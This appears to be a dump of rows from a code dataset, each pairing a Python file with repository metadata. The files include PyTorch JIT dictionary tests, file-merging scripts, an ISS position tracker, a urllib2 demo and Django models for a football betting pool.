# checkScript doesn't copy the inputs, so we can't use it since this mutates
# the dict
def tester(fn, *args):
eager_out = fn(self.dict(), *args)
script_out = torch.jit.script(fn)(self.dict(), *args)
self.assertEqual(eager_out, script_out)
tester(pop, 'a')
with self.assertRaisesRegex(RuntimeError, "KeyError"):
torch.jit.script(pop)(self.dict(), 'x')
def default_pop(x, key, default):
# type: (Dict[str, Tensor], str, Tensor) -> Tuple[Tensor, Dict[str, Tensor]]
return x.pop(key, default), x
tester(default_pop, 'a', torch.randn(2, 2))
tester(default_pop, 'x', torch.randn(2, 2))
def test_setdefault(self):
def setdefault(x, key, default):
# type: (Dict[str, Tensor], str, Tensor) -> Dict[str, Tensor]
x.setdefault(key, default)
return x
self.checkScript(setdefault, (self.dict(), 'a', torch.randn(2, 2)))
self.checkScript(setdefault, (self.dict(), 'nonexistant', torch.randn(2, 2)))
def test_update(self):
def update(a, b):
# type: (Dict[str, Tensor], Dict[str, Tensor]) -> Tuple[Dict[str, Tensor], Dict[str, Tensor]]
a.update(b)
return a, b
self.checkScript(update, (self.dict(), self.dict()))
self.checkScript(update, (self.dict(), self.dict2()))
def test_aug_assign(self):
def aug_assign_dict_tensor(a):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
a['a'] += 1
a['b'] -= 12
a['c'] *= 122
a['c'] /= 2
a['c'] %= 2
return a
def aug_assign_dict_prim(a):
# type: (Dict[str, float]) -> Dict[str, float]
a['a'] += 3.4
a['b'] -= 2.4
a['c'] *= 3.0
a['c'] /= 2.0
a['c'] %= 2.0
return a
self.checkScript(aug_assign_dict_tensor, (self.dict(),))
self.checkScript(aug_assign_dict_prim, ({'a': 3.0, 'b': 2.0, 'c': 4.0},))
def test_popitem(self):
@torch.jit.script
def popitem(x):
# type: (Dict[str, Tensor]) -> Tuple[Tuple[str, Tensor], Dict[str, Tensor]]
item = x.popitem()
return item, x
# The value returned by Python is arbitrary, so we can't use checkScript
eager_in = self.dict()
eager_out = (eager_in.popitem(), eager_in)
script_out = popitem(self.dict())
# Check that an item was removed
self.assertEqual(len(eager_out[1]), len(script_out[1]))
# Check that the item is the correct types
self.assertTrue(isinstance(script_out[0][0], str))
self.assertTrue(isinstance(script_out[0][1], torch.Tensor))
def test_clear(self):
def clear(x):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
x.clear()
return x
self.checkScript(clear, (self.dict(),))
def test_get(self):
def get(x, key):
# type: (Dict[str, Tensor], str) -> Optional[Tensor]
return x.get(key)
self.checkScript(get, (self.dict(), 'a'))
self.checkScript(get, (self.dict(), "doesn't exist"))
def get_default(x, key):
# type: (Dict[str, Tensor], str) -> Optional[Tensor]
return x.get(key, torch.randn(2, 2))
self.checkScript(get, (self.dict(), 'a'))
self.checkScript(get, (self.dict(), "doesn't exist"))
def test_basic(self):
def simple(x):
# type: (Dict[str, int]) -> Dict[str, int]
return x
self.checkScript(simple, ({'item': 20, 'other_item': 120},))
def index(x):
# type: (Dict[str, int]) -> int
return x['item']
self.checkScript(index, ({'item': 20, 'other_item': 120},))
def type_default():
# type: () -> Dict[str, Tensor]
return {}
self.checkScript(type_default, ())
@torch.jit.script
def missing_index(x):
# type: (Dict[str, int]) -> int
return x['dne']
with self.assertRaisesRegex(RuntimeError, "KeyError"):
missing_index({'item': 20, 'other_item': 120})
code = dedent('''
def literal1():
return torch.jit.annotate(Dict[int, float], {})
def literal2():
return torch.jit.annotate(Dict[int, float], {10: 1.2})
''')
cu = torch.jit.CompilationUnit(code)
self.assertEqual({}, cu.literal1())
self.assertEqual({10: 1.2}, cu.literal2())
cu = torch.jit.CompilationUnit(dedent('''
def literal3():
return torch.jit.annotate(Dict[int, float], {10: 1.2, 11: 1.3})
'''))
self.assertEqual({10: 1.2, 11: 1.3}, cu.literal3())
def list_of_dicts():
# type: () -> List[Dict[str, Tensor]]
return [{'word': torch.ones(2) + 3}, {'other word': torch.ones(1) + 2}]
self.checkScript(list_of_dicts, ())
def test_mutability(self):
@torch.jit.script
def fn():
# type: () -> Dict[str, int]
a = torch.jit.annotate(Dict[str, int], {})
a['ok'] = 10
return a
self.assertEqual(fn(), {'ok': 10})
def test_key_type(self):
with self.assertRaisesRegex(RuntimeError, "but instead found type"):
@torch.jit.script
def fn(a):
# type: (Dict[str, int]) -> int
return a[None]
def test_loop(self):
@torch.jit.script
def fn(x):
# type: (int) -> Dict[str, int]
a = torch.jit.annotate(Dict[str, int], {})
for i in range(x):
a['ok'] = i
return a
self.assertEqual(fn(10), {'ok': 9})
def test_view(self):
def fn(x, y):
l = {"a": x}
x_view = l["a"]
a = x + x
x_view.add_(y)
b = x + x
return a == b
self.checkScript(fn, (torch.rand(2, 3), torch.rand(2, 3)))
def test_membership(self):
def fn(x, y):
# type: (Dict[int, int], int) -> int
return x.get(y, 3)
d = {1: 2, 3: 4}
self.checkScript(fn, (d, 3))
self.checkScript(fn, (d, 2))
def optional(x, y):
# type: (Dict[int, int], int) -> bool
res = x.get(y)
return res is None
self.checkScript(fn, (d, 3))
self.checkScript(fn, (d, 2))
with self.assertRaisesRegex(RuntimeError, "is actually of type Optional"):
@torch.jit.script
def bad_types(x, y):
# type: (Dict[int, int], int) -> int
return x.get(y) # noqa: T484
def test_dict_to_python(self):
@torch.jit.ignore
def python_lookup(my_dict, keys):
# type: (Dict[str, int], List[str]) -> List[int]
return [my_dict[k] for k in keys]
def fn(my_dict, keys):
# type: (Dict[str, int], List[str]) -> List[int]
return python_lookup(my_dict, keys)
a_dict = {'a': torch.ones(1), 'b': torch.ones(1) + 1, 'c': torch.ones(1) + 2}
self.checkScript(fn, (a_dict, ('a', 'c')))
def test_ordered_dict(self):
def test_func(fn, inputs):
self.assertEqual(fn(*inputs), torch.jit.script(fn)(*inputs))
def repeated_key():
return OrderedDict([(1, 2), (2, 3), (1, 4)])
test_func(repeated_key, ())
def no_args():
a = OrderedDict()
a["one"] = torch.tensor(1)
a["two"] = torch.tensor(2)
test_func(no_args, ())
def test_dict_constructor():
a = dict()
a["one"] = torch.tensor(1)
return a, dict([(1, 2), (2, 3), (1, 4)]) # noqa: C406
test_func(test_dict_constructor, ())
def test_dict_error():
a = dict()
a[1] = 2
return a
with self.assertRaisesRegex(Exception, "Arguments for call are not"):
torch.jit.script(test_dict_error)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
1b17aeab88cd05b937fdf0af926cdd3a0dc7c52c | d076c40c36685a985958c5ba7e14761a966cf333 | /interview/set_border.py | eddcf7e62cacdab707be8571c7f378e1ce940ab8 | [] | no_license | yehongyu/acode | e65eb230210c657b8c5e4d5928cbe9437f77d717 | 176cc1db3291843fb068f06d0180766dd8c3122c | refs/heads/master | 2023-04-20T14:27:45.123969 | 2021-05-08T04:36:39 | 2021-05-08T04:36:39 | 365,412,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,319 | py | def dfs2(grid, i, j):
m = len(grid)
n = len(grid[0])
directions = [[0,1], [0,-1], [1,0], [-1,0]]
is_border = False
for direct in directions:
ni = i + direct[0]
nj = j + direct[1]
if ni<0 or nj<0 or ni>=m or nj>=n:
is_border = True
continue
if grid[ni][nj] == 0:
is_border = True
continue
if grid[ni][nj] in [2, 3]:
continue
grid[ni][nj] = 3
dfs2(grid, ni, nj)
if is_border == True:
grid[i][j] = 2
'''
0: water,
1: island
2: is island, visited, border of island
3: is island, visited, not border
border island: 1-->3-->2
not border: 1-->3-->1
'''
def set_border(grid):
m = len(grid)
if m <= 0: return 0
n = len(grid[0])
if n<= 0: return 0
count = 0; visited = set()
for i in range(m):
for j in range(n):
if grid[i][j] == 1:
grid[i][j] = 3
dfs2(grid, i, j)
count += 1
for i in range(m):
for j in range(n):
if grid[i][j] == 3:
grid[i][j] = 1
grid = [
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 0, 0, 1],
[0, 1, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 1, 1, 0, 1, 1,],
[0, 0, 0, 0, 0, 0, 0, 0]
]
set_border(grid)
for val in grid:
print(val)
| [
"aodandan@bytedance.com"
] | aodandan@bytedance.com |
fc6c2ceeb4e6a0231c0cd453449b3182c0f64351 | 60814a33c10069ac92f2621463bfa0acfed16f7e | /购物类/Half_ebay/file_os.py | 4c24ad575b0c3493c65936b6fceff97e86198b79 | [] | no_license | ijt0walle/LiuFan_Spider | 967138c79bb4f6097fb8d898892a02c5fd6a454c | 25c07e7d594a835d123530bb49bce77a5bd7f662 | refs/heads/master | 2021-01-25T13:18:28.306502 | 2017-08-15T02:32:08 | 2017-08-15T02:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,755 | py | import os
def qvzong():
for i in os.listdir('/home/ytroot/桌面/Update_file/'):
with open('/home/ytroot/桌面/Update_file/'+i,'r') as asin_file:
with open('/home/ytroot/桌面/Update_file/zong_file.txt','a') as zong:
zong.write(asin_file.read())
with open('/home/ytroot/桌面/WorkSpaceLHW/Half.ebay/Data/snatch/total_asin.txt','r') as total_file:
total_all = total_file.readlines()
total = []
for tt in total_all:
total.append(tt.replace('\n',''))
print (len(total))
with open('/home/ytroot/桌面/Update_file/zong_file.txt','r') as zong_file:
muyqian_all = zong_file.readlines()
muyqian = []
for zz in muyqian_all:
muyqian.append(zz.replace('\r','').replace('\n',''))
print (len(muyqian))
last = list(set(total) - set(muyqian))
print (len(last))
print (len(list(set(total)&set(muyqian))))
with open('/home/ytroot/桌面/Update_file/last.txt','a') as last_file:
for ll in last:
last_file.write(ll+'\n')
'''把每天抓取的文件合成一份'''
def Hebing():
on_shelf = '/home/ytroot/桌面/onshelf_info.csv'
half_info = '/home/ytroot/桌面/half_info.csv'
not_crawl = '/home/ytroot/桌面/not_crawl.txt'
on_shelf_file = open(on_shelf,'aw')
half_info_file = open(half_info,'aw')
# not_crawl_file = open(not_crawl,'aw')
on_shelf_list = []
for item1 in open('/home/ytroot/桌面/info/onshelf_info1.csv','r').readlines():
item1 = item1.split('\n')[0]
on_shelf_list.append(item1)
for item2 in open('/home/ytroot/桌面/info/onshelf_info2.csv','r').readlines():
item2 = item2.split('\n')[0]
on_shelf_list.append(item2)
for item3 in open('/home/ytroot/桌面/info/onshelf_info3.csv', 'r').readlines():
item3 = item3.split('\n')[0]
on_shelf_list.append(item3)
for item4 in open('/home/ytroot/桌面/info/onshelf_info4.csv','r').readlines():
item4 = item4.split('\n')[0]
on_shelf_list.append(item4)
for item5 in open('/home/ytroot/桌面/info/onshelf_info5.csv','r').readlines():
item5 = item5.split('\n')[0]
on_shelf_list.append(item5)
for item6 in open('/home/ytroot/桌面/info/onshelf_info6.csv','r').readlines():
item6 = item6.split('\n')[0]
on_shelf_list.append(item6)
for item7 in open('/home/ytroot/桌面/info/onshelf_info7.csv','r').readlines():
item7 = item7.split('\n')[0]
on_shelf_list.append(item7)
for item8 in open('/home/ytroot/桌面/info/onshelf_info8.csv','r').readlines():
item8 = item8.split('\n')[0]
on_shelf_list.append(item8)
for item9 in open('/home/ytroot/桌面/info/onshelf_info9.csv','r').readlines():
item9 = item9.split('\n')[0]
on_shelf_list.append(item9)
for item_z in on_shelf_list:
on_shelf_file.write(item_z+'\n')
half_info_list = []
for item1 in open('/home/ytroot/桌面/info/half_info1.csv', 'r').readlines():
item1 = item1.split('\n')[0]
half_info_list.append(item1)
for item2 in open('/home/ytroot/桌面/info/half_info2.csv', 'r').readlines():
item2 = item2.split('\n')[0]
half_info_list.append(item2)
for item3 in open('/home/ytroot/桌面/info/half_info3.csv', 'r').readlines():
item3 = item3.split('\n')[0]
half_info_list.append(item3)
for item4 in open('/home/ytroot/桌面/info/half_info4.csv', 'r').readlines():
item4 = item4.split('\n')[0]
half_info_list.append(item4)
for item5 in open('/home/ytroot/桌面/info/half_info5.csv', 'r').readlines():
item5 = item5.split('\n')[0]
half_info_list.append(item5)
for item6 in open('/home/ytroot/桌面/info/half_info6.csv', 'r').readlines():
item6 = item6.split('\n')[0]
half_info_list.append(item6)
for item7 in open('/home/ytroot/桌面/info/half_info7.csv', 'r').readlines():
item7 = item7.split('\n')[0]
half_info_list.append(item7)
for item8 in open('/home/ytroot/桌面/info/half_info8.csv', 'r').readlines():
item8 = item8.split('\n')[0]
half_info_list.append(item8)
for item9 in open('/home/ytroot/桌面/info/half_info9.csv', 'r').readlines():
item9 = item9.split('\n')[0]
half_info_list.append(item9)
for item_y in half_info_list:
half_info_file.write(item_y + '\n')
# not_crawl_list = []
# for item1 in open('/home/ytroot/桌面/info/not_crawl1.txt', 'r').readlines():
# item1 = item1.split('\n')[0]
# not_crawl_list.append(item1)
# for item2 in open('/home/ytroot/桌面/info/not_crawl2.txt', 'r').readlines():
# item2 = item2.split('\n')[0]
# not_crawl_list.append(item2)
# for item3 in open('/home/ytroot/桌面/info/not_crawl3.txt', 'r').readlines():
# item3 = item3.split('\n')[0]
# not_crawl_list.append(item3)
# for item4 in open('/home/ytroot/桌面/info/not_crawl4.txt', 'r').readlines():
# item4 = item4.split('\n')[0]
# not_crawl_list.append(item4)
# for item5 in open('/home/ytroot/桌面/info/not_crawl5.txt', 'r').readlines():
# item5 = item5.split('\n')[0]
# not_crawl_list.append(item5)
# for item6 in open('/home/ytroot/桌面/info/not_crawl6.txt', 'r').readlines():
# item6 = item6.split('\n')[0]
# not_crawl_list.append(item6)
# for item7 in open('/home/ytroot/桌面/info/not_crawl7.txt', 'r').readlines():
# item7 = item7.split('\n')[0]
# not_crawl_list.append(item7)
# for item8 in open('/home/ytroot/桌面/info/not_crawl8.txt', 'r').readlines():
# item8 = item8.split('\n')[0]
# not_crawl_list.append(item8)
# for item_y in not_crawl_list:
# not_crawl_file.write(item_y + '\n')
'''把抓过的asin从total_asin_everyday20w文件删掉'''
def lalalla():
total_asin_offshelf_file = []
for total_asin_offshelf in open('./Data/snatch/1468148.txt','r').readlines():
total_asin_offshelf = total_asin_offshelf.split('\n')[0]
if total_asin_offshelf == '\n':
pass
total_asin_offshelf_file.append(total_asin_offshelf)
for part_day20 in total_asin_offshelf_file[:400000]:
if part_day20 == '\n':
pass
else:
with open('./Data/snatch/total_asin_offshelf_part2.txt','aw') as part_day20_file:
part_day20_file.write(part_day20+'\n')
for total_asin_item in total_asin_offshelf_file[400000:]:
with open('./Data/snatch/1468148_.txt','aw') as total_asin_file:
total_asin_file.write(total_asin_item+'\n')
if __name__ == '__main__':
# qvzong()
# Hebing()
lalalla() | [
"liufan.dery@gmail.com"
] | liufan.dery@gmail.com |
de2fcd4054cdbe0af94fee227d9ee853571bed03 | 39a91240698719d2ad420e010558398097f4cd98 | /tracker.py | 26c97ce30d36f23767b5283c059fcb59222dbaf3 | [] | no_license | maxcohen31/iss-tracker | e7b3b7d9584d6a403bab981d45126318165eb9f5 | e6b56443401938ead1ddb36db6d8ed71a11f8b73 | refs/heads/main | 2023-06-03T20:19:56.800614 | 2021-06-17T07:51:29 | 2021-06-17T07:51:29 | 377,188,962 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,882 | py | # Internation Space Station tracker
# Author: Emanuele
import requests
import pandas as pd
import matplotlib.pyplot as plt
import plotly.express as px
# Startint the Tracker Class
class Tracker:
def __init__(self):
self.url = requests.get('http://api.open-notify.org/iss-now.json').json() # get the url
self.df = pd.DataFrame.from_dict(self.url) # making a dataframe using pandas
self.people_url = requests.get('http://api.open-notify.org/astros.json').json()
# Method to get the ISS latitude
def get_latitude(self):
self.df = self.df.transpose()
return f"Latitude: {self.df['latitude'][0]}"
# Method to get the ISS longitude
def get_longitude(self):
self.df = self.df.transpose()
return f"Longitude: {self.df['longitude'][0]}"
# Method to get the number of astronauts living in the ISS
def get_people(self):
self.df_people = pd.DataFrame.from_dict(self.people_url).transpose()
return self.df_people.loc['number'][0])
# Method to get the names of the astronauts
def get_names(self):
self.df_people = pd.DataFrame.from_dict(self.people_url) # New dataframe
for key, value in self.df_people['people'][0:].items(): # A for loop to get the names
return value['name']
# At least the method to plot the ISS on a map
def show_position(self):
self.df['latitude'] = self.df.loc['latitude', 'iss_position'] # Creating a new column named latitude
self.df['longitude'] = self.df.loc['longitude', 'iss_position'] # Creating a new column named longitude
self.df.reset_index(inplace=True) # We change the original dataframe
iss_pos = px.scatter_geo(self.df, lat='latitude', lon='longitude') # Setting up the plot
iss_pos.show() # Show
| [
"eman_93@hotmail.it"
] | eman_93@hotmail.it |
afd23258eacb7c4b2e2e5e09bdb7125d42b7a16e | 9173befb29e5819f19cedc4f2eee75c8811acf32 | /PA/test/test_urllib2.py | a6b14238e9a8c312ddfc099b8571e09579495d79 | [] | no_license | Coder-Chandler/Go_1 | 81c43450eb0e00321f5c8c1eadde611620a68d04 | b5dcd01d3fd429a5681bb151fceaf56d6e65c345 | refs/heads/master | 2021-01-20T02:04:11.120918 | 2017-06-26T11:02:16 | 2017-06-26T11:02:16 | 89,365,719 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | import urllib2
import cookielib
url = 'http://baike.baidu.com/item/Python'
print 'The first method !'
response1 = urllib2.urlopen(url)
print response1.getcode()
print len(response1.read())
print 'The second method !'
request = urllib2.Request(url)
request.add_header('user-agent', 'Mozilla/5.0')
response2 = urllib2.urlopen(request)
print response2.getcode()
print len(response2.read())
print 'The third method'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response3 = urllib2.urlopen(request)
print response3.getcode()
print cj
print response3.read()
| [
"ysiwgtus@gmail.com"
] | ysiwgtus@gmail.com |
dfdf57410ffde803f2a84176e3408295a99ddda8 | d2189145e7be2c836017bea0d09a473bf1bc5a63 | /Practica0PerezAyalaYocoyaniEhecatzin/E4/Conjuntos.py | dd16656709d225a17f9b0c13958027e7fc7be87c | [] | no_license | emilianoNM/Tecnicas3 | 12d10ce8d78803c8d2cd6a721786a68f7ee2809d | 6ad7f0427ab9e23643a28ac16889bca8791421d0 | refs/heads/master | 2020-03-25T18:06:34.126165 | 2018-11-24T04:42:14 | 2018-11-24T04:42:14 | 144,013,045 | 3 | 5 | null | 2018-09-14T10:47:26 | 2018-08-08T12:49:57 | Python | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 16 18:55:57 2018
@author: yocoy
"""
class Conjuntos:
def __init__(self,conjunto, valMin, valMax):
self.conjunto = conjunto
self.valMin = valMin
self.valMax = valMax
self.c1 = []
self.c2 = []
self.c3 = []
self.c4 = []
def hacedor(self):
for x in self.conjunto:
if x < self.valMin:
self.c1.append(x)
elif x < self.valMax:
self.c2.append(x)
elif x > self.valMax:
self.c3.append(x)
else :
self.c4.append(x)
return self.c1, self.c2, self.c3, self.c4 | [
"noreply@github.com"
] | emilianoNM.noreply@github.com |
713a555746153178b3e06918761bfa99cd7539a2 | 53c8c1e3e87d2afe0ac032b3622108fcd267b948 | /MineSweeperOLD.py | 1a71607ff0d5937db8a8c62e86274352d164cd75 | [] | no_license | nsantacruz/mineVacuum | bd2a810cbb89c111dee95526218ba5a11c6fed3a | 2c9d1bd0bb139046b26928741e907c5377d784c8 | refs/heads/master | 2020-03-29T14:03:49.190822 | 2014-02-16T17:10:04 | 2014-02-16T17:10:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,024 | py | #UPDATES#
#adjacent arrays now update for both bs and us each time a space is clicked (still needs a bit of work)
#updated to agree with rest of world: the (row, column) standard has been adopted
from Square import *
from GridVisualizer import *
import random
class MineSweeper():
def __init__(this,wid=9,hei=9,mines=10):
this.grid = []
this.numMines = mines
this.mines = []
this.startedGame = False
this.h = hei
this.w = wid
for y in range(wid):
this.grid.append([])
for x in range(hei):
tempSq = Square(0,vis=False)
tempSq.setPosition(x,y)
this.grid[y].append(tempSq)
def addMines(this,x,y): #parameters signify spot that was clicked, don't add mines around it
minesToPlace = this.numMines
while(minesToPlace>0):
randY = random.randint(0,this.h-1)
randX = random.randint(0,this.w-1)
if this.grid[randY][randX].number != -1 and not (randY in range(y-1,y+2) and randX in range(x-1,x+2)):
tempMine = Square(-1)
tempMine.setPosition(randX,randY)
this.mines.append(tempMine)
this.grid[randY][randX] = tempMine
minesToPlace-=1
def addNumbers(this):
for mine in this.mines:
mineX = mine.position[0]
mineY = mine.position[1]
#print(mine.number)
for pos in this.getSurroundingPositions(mineX,mineY):
if this.grid[pos[1]][pos[0]].number != -1:
this.grid[pos[1]][pos[0]].number+=1
def chooseSpace(this,x,y):
#if first click, add mines but not around spot that was clicked
if not this.startedGame:
this.addMines(x,y)
this.addNumbers()
this.startedGame = True
revealed = this.revealSpace(x,y)
this.updateAdjacent(revealed)
# a cool recursive function, but I think it's a bit too lenient when it comes
#to revealing squares, maybe that's just me...
#prevRevealedTiles is a parameter used to pass the revealedTiles list between
#different levels of the functions recursion. Pretty cool...
#returns a list of revealed tiles, usefule for solving hopefully
def revealSpace(this,x,y,prevRevealedList=None):
tempSq = this.grid[y][x]
if prevRevealedList:
revealedList = prevRevealedList
else:
revealedList = []
if not (tempSq.visible or tempSq.flagged):
if tempSq.number == -1:
print('Game Over :(')
#if you found a 0, you can safely reveal all surrounding tiles
elif tempSq.number == 0:
tempSq.visible = True
revealedList.append(tempSq)
for pos in this.getSurroundingPositions(x,y):
this.revealSpace(pos[0],pos[1],prevRevealedList=revealedList)
else: #number is 1-8
tempSq.visible = True
revealedList.append(tempSq)
#print(len(revealedList)) watch as it grows!
return revealedList
#uses list of squares that were just revealed to update adjacent arrays of
#both the bs and us. first loop through bs, cause that's what you have
#while looping, keep track of us so you can loop through them afterward
def updateAdjacent(this,revealedSqs):
unrevealedList = []
#border squares
for bs in revealedSqs:
if bs.number == 0:
continue
else:
xPos = bs.position[0]
yPos = bs.position[1]
for pos in this.getSurroundingPositions(xPos,yPos):
tempSq = this.grid[pos[1]][pos[0]]
if not tempSq.visible:
bs.addAdj(tempSq)
#make sure this is not already in the unrevealedList
if not tempSq in unrevealedList:
unrevealedList.append(tempSq)
#unrevealed squares
for us in unrevealedList:
xPos = us.position[0]
yPos = us.position[1]
for pos in this.getSurroundingPositions(xPos,yPos):
tempSq = this.grid[pos[1]][pos[0]]
if tempSq.visible:
us.addAdj(tempSq)
# give it a x,y position and it returns all the valid positions directly adjacent
def getSurroundingPositions(this,X,Y):
posList = []
for y in range(Y-1,Y+2):
if y >= 0 and y < this.h:
for x in range(X-1,X+2):
if x >= 0 and x < this.w:
posList.append((x,y))
return posList
ms = MineSweeper(wid=9,hei=9, mines=10)
ms.chooseSpace(0,0)
#print(len(ms.grid[0][2].adjacent))
visualize(ms)
| [
"noahssantacruz@gmail.com"
] | noahssantacruz@gmail.com |
b177eac8b5c5e6190923e5b18cf0a21b24710473 | 7326629ac2c3ea608ca55b95ff60d26e0b9a1ab8 | /app/models.py | 81e7434847987e1d8eab9d28197cce92fb69b7cc | [] | no_license | HenryGBC/quiniela | 22b72946ae19ffa8f39b72d737830c63109a53a1 | bfa62cd086dd197b563494c685211d889c962ec4 | refs/heads/master | 2021-01-19T17:41:53.223050 | 2014-02-11T15:30:57 | 2014-02-11T15:30:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,408 | py | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Fecha(models.Model):
fecha = models.CharField(max_length = 2)
fechaInicio = models.DateField()
fechaFin = models.DateField()
def __unicode__(self):
return self.fecha
class Resultado(models.Model):
usuario = models.ForeignKey(User)
fecha = models.ForeignKey(Fecha)
local = models.CharField(max_length = 100)
marcadorLocal = models.IntegerField(default = 0)
visitante = models.CharField(max_length = 100)
marcadorVisitante = models.IntegerField(default = 0)
puntos = models.IntegerField()
fechaGuardada = models.BooleanField(default = False)
puntajeCalculado = models.BooleanField(default = False)
def __unicode__(self):
return "%s - %s" % (self.usuario, self.fecha)
class Partido(models.Model):
fecha = models.ForeignKey(Fecha)
local = models.CharField(max_length=100)
visitante = models.CharField(max_length=100)
fechaPartido= models.DateField()
sluglocal = models.SlugField(max_length=100, blank=True)
slugvisitante = models.SlugField(max_length=100, blank=True)
def save(self, *args, **kwargs):
self.sluglocal = self.local.lower().replace(' ','-')
self.slugvisitante = self.visitante.lower().replace(' ','-')
super(Partido, self).save(*args, **kwargs)
def __unicode__(self):
return"%s - %s - %s " % (self.fecha, self.local, self.visitante)
class PartidoFinal(models.Model):
fecha = models.ForeignKey(Fecha)
local = models.CharField(max_length=100)
marcadorLocal = models.IntegerField(default = 0)
visitante = models.CharField(max_length=100)
marcadorVisitante = models.IntegerField(default = 0)
fechaPartido= models.DateField()
def __unicode__(self):
return"%s - %s - %s " % (self.fecha, self.local, self.visitante)
class Usuario(models.Model):
usuario = models.ForeignKey(User)
nombre = models.CharField(max_length= 100)
moroso = models.BooleanField(default=False)
puntos = models.IntegerField()
def __unicode__(self):
return self.nombre
class FechaAJugar(models.Model):
fechaEnJuego = models.CharField(max_length= 2)
def __unicode__(self):
return "Fecha %s en juego" % (self.fechaEnJuego)
class TablaFecha(models.Model):
fecha = models.ForeignKey(Fecha)
usuario = models.ForeignKey(User)
puntos = models.IntegerField(default=0)
def __unicode__(self):
return "%s - %s - %s" %(self.fecha, self.usuario, self.puntos) | [
"henry.bravo89@gmail.com"
] | henry.bravo89@gmail.com |
7132bef4d76833c2866aaccc5b4dce37682cb7e5 | 4b27a7e99c55a343cb845d085dd88aa7e77a8079 | /reading.py | e4cdb2c32e224e29e2ea14e277493584ec7edce1 | [] | no_license | damodardikonda/Python-Pandas- | a1f0395a9514dbb639116d35ae465b7135d92c2c | de95146cbb01047d87a5bb297d94c21181dbd629 | refs/heads/master | 2022-09-19T01:25:31.985004 | 2020-06-05T07:35:44 | 2020-06-05T07:35:44 | 269,561,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | import pandas as pd
import numpy as np
df=pd.read_csv("files.csv",index_col=['Name'])
print(df)
print('\n\n changingthe type of float, ')
df1=pd.read_csv("files.csv",dtype={'Salary':np.float})
print(df1.dtypes)
print("df headers")
df2=pd.read_csv("files.csv",names=['A','B','C','D','E'],skiprows=2)
print(df2)
| [
"damodar2dikonda@gmail.com"
] | damodar2dikonda@gmail.com |
48a06adba43b3407a9e9c44ca62636abccd4368d | e531794fab5a6c0c670fe7eb1f19e307b5921ffd | /learning_journal/learning_journal/scripts/initializedb.py | 9b0a914a45acd7633528b50182c09e5b2571689b | [] | no_license | shoaib369/learning-journal | ff961b104e235a8faa6a105c91733771cf01cfe9 | 2084a4bb9f6410f3f7918e8ecd2dc2ecaff2680c | refs/heads/master | 2020-06-03T11:42:21.059112 | 2015-04-10T05:34:34 | 2015-04-10T05:34:34 | 33,709,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 909 | py | import os
import sys
import transaction
from sqlalchemy import engine_from_config
from pyramid.paster import (
get_appsettings,
setup_logging,
)
from pyramid.scripts.common import parse_vars
from ..models import (
DBSession,
MyModel,
Base,
)
def usage(argv):
cmd = os.path.basename(argv[0])
print('usage: %s <config_uri> [var=value]\n'
'(example: "%s development.ini")' % (cmd, cmd))
sys.exit(1)
def main(argv=sys.argv):
if len(argv) < 2:
usage(argv)
config_uri = argv[1]
options = parse_vars(argv[2:])
setup_logging(config_uri)
settings = get_appsettings(config_uri, options=options)
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
Base.metadata.create_all(engine)
# with transaction.manager:
# model = MyModel(name='two', value=1)
# DBSession.add(model)
| [
"shoaib.maks@live.com"
] | shoaib.maks@live.com |
eb2025415cacf09b3f30f758ba273518c5712b56 | d3adb94b12bdbb041b05d60f36386251a5b3ed89 | /forms.py | 49827eb8693b2e0657fb008b5c533f77a224e802 | [] | no_license | 100ballovby/PyOWM_Flask | 44f11aeac00512fffa43ad2493b25f727006cd36 | 720d0af81c52debdda4be440db8007b620e95c0f | refs/heads/master | 2023-03-23T22:41:02.780567 | 2021-03-16T17:11:06 | 2021-03-16T17:11:06 | 346,085,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from wtforms import StringField, SubmitField
from flask_wtf import FlaskForm
class SearchForm(FlaskForm):
city = StringField('City name')
submit = SubmitField('Submit')
| [
"greatraksin@icloud.com"
] | greatraksin@icloud.com |
7e2dee67cc6ec9f0d5655e38183c4b713eefd8f5 | fe62f810f4256b6811068ac2d2e27a2d9ab79ea7 | /setup.py | 77ba600e447a6c3279fec271e5d59b2081f225fa | [] | no_license | DavidPerezGomez/MySQLConnector | 06a3e20ae8ac36996d4550271a3193c7300d39b4 | 05459b32c3db1b5b5170f377c71c04b1d2fe8333 | refs/heads/master | 2021-05-04T05:24:15.964899 | 2018-02-05T18:46:07 | 2018-02-05T18:46:07 | 120,338,002 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | from distutils.core import setup
setup(name='mysqlconnector',
version='1.0',
description='',
author='',
author_email='',
url='',
py_modules=['mysqlconnector/connector'],
)
| [
"davidperezgo@gmail.com"
] | davidperezgo@gmail.com |
6d3a3293e455a01c45e56bcb29d7751c226dc716 | 9546d8f6f675a9bfb1460a175ce9c4586af69107 | /blog/migrations/0004_post_tags.py | 95298454102691cd749448ad7c9f07ff17737d0c | [] | no_license | zmm064/DjangoByExample1_Blog | c759a493b7409cee7303259273a369ac970623da | 1db8e0a0290b70449df431966a89c949e39a0505 | refs/heads/master | 2021-04-06T08:03:50.040622 | 2018-03-17T03:10:56 | 2018-03-17T03:10:56 | 125,333,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-03-15 13:11
from __future__ import unicode_literals
from django.db import migrations
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
